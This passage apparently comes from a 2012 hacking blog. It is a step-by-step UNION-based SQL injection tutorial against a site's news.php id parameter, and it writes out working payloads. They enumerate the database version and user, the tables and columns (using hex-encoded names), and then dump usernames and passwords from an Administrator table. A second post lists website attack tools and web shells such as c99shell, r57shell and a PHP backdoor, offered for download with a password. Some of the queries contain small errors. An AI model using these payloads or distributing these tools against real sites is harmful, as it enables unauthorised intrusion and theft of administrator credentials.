http://www.site.com/news.php?id=-4 UNION ALL SELECT 1,2,group_concat(version(),0x3a,database(),0x3a,user()),4–

or

http://www.site.com/news.php?id=-4 UNION ALL SELECT 1,2,CONCAT_WS(CHAR(32,58,32),version(),database(),user()),4–

Getting Table Names: It is good habit to check the table name of all the databases because sometimes the current database does not contains useful information.

To get the table names of current database:

http://www.site.com/news.php?id=-4 UNION ALL SELECT 1,2,group_concat(table_name),4 from information_scheme.tables where table_schema=database()–

Assume it gave you the following names of the tables contains in the current database(in our example db_site).
Ex. News, Gallery, Games etc.
As you can see it is not looks useful, so get the table names of other database(in our example db_main), but to do so you have to encode the name of the database in hexadecimal form and put ’0x’ in front of the encoded hexed name to tell the database that it is hex encoded and and it need to be decoded it to get the right name. In our example we need to get the table name of database ‘db_main’ after encoding it to hex it is equivalent to ’64625f6d61696e’. To get the table names of the database ‘db_main’:
http://www.site.com/news.php?id=-4 UNION ALL SELECT 1,2,group_concat(table_name),4 from information_schema.tables where table_schema=0x64625f6d61696e–

It will give you the name of all tables in the database ‘db_main’.
Ex: newsletters, posts, Administrator

Now we can see that this is a good stuff.

NOTE: Online Text to Hex converter: http://www.swingnote.com/tools/texttohex.php

Getting Column Names: Now to extract data from table Administrator we need to find the columns in it. To get this you would do:

http://www.site.com/news.php?id=-4 UNION ALL SELECT 1,2,group_concat(column_name),4 from information_schema.columns where table_name=0x41646d696e6973747261746f72–

NOTE: We replace ‘information_schema.tables‘ with ‘information_schema.columns‘ and ‘table_schema‘ with ‘table_name‘. Again we encoded ‘Administrator’ in Hex to get our query work.

Now you should see the column names.
Ex: Id,Username,Password

Now to extract data from columns ‘Id,Username,Password‘ of table ‘Administrator‘ of database ‘db_main‘, you would do:

http://www.site.com/news.php?id=-4 UNION ALL SELECT 1,2,group_concat(CONCAT_WS(CHAR(32,58,32),Id,Username,Password)) from db_main.Administrator–

Sometimes it will not work then you have to encode ‘db_main.Administrator‘ into hex:

http://www.site.com/news.php?id=-4 UNION ALL SELECT 1,2,group_concat(CONCAT_WS(CHAR(32,58,32),Id,Username,Password)) from 0x64625f6d61696e2e41646d696e6973747261746f72–

Sunday 17 June 2012

WEBSITE HACKING TOOL



Apache Hacking Tools Directory:

Apache Chunked Scanner
Apache Hacker Tool v 2.0
Apache Hacker Script


Remote File Inclusion And Remote Command Execution Directory :

IIS 5 Dav Scanner & Exploiter
PHP Attacker
PHP Injection Scanner & Exploiter
XML-RPC Scanner & Exploiter


Databases & SQL Injection & XSS Tools Directory

Casi 4.0
ForceSQL
Mssql BruteForce Tool
SQL Ping 2
SQL Recon
SQL Vuln Scanner
SQL & XSS Tool
PHP Shells

rootshell v2.0
c99shell #16
Backdoor php v0.1
r57shell
ajan
casus15
cmd (asp)
CyberEye (asp)
CyberSpy5 (asp)
Indexer (asp)
Ntdaddy (asp)
News Remote PHP Shell Injection
PHP Shell
phpRemoteView
nstview php shell

DOWLOAD

Password:
starski